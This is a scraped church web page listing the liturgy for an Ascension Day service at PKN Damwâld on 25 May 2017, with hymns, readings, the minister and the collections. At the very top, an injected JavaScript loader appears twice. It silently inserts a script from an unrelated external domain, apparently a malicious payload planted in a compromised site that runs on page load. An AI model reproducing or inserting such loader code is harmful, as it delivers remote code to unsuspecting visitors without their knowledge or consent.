;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst Hemelvaartsdag - PKN Damwâld
donderdag 25 mei 2017
09:30 uur

Kerkdienst Hemelvaartsdag

Informatie

Voorganger:Dhr. L. Blees
Organist:Foeke Wiegersma
Liturgie
lied voor de dienst Elb 142
Welkom en mededelingen
We zingen: Psalm 47 : 1, 2 en 3
Stilgebed , Votum en Groet
We zingen: Psalm 143 vers 6 en 9
Gebed
Geloofsbelijdenis; Zondag 18 vraag en antwoord 46 en 47
We zingen: ELB 348 vers 1, 3 en 4
We lezen: Lukas 24 vers 36 tot en met 53
We zingen: Psalm 138 vers 1 en 3
Preek
We zingen: ELB 140
Dankgebed .
Collecte
slotlied Gezang 456 vers 1, 2 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Diaconie
Tweede collecte: Kerk
Uitganscollecte: Kerk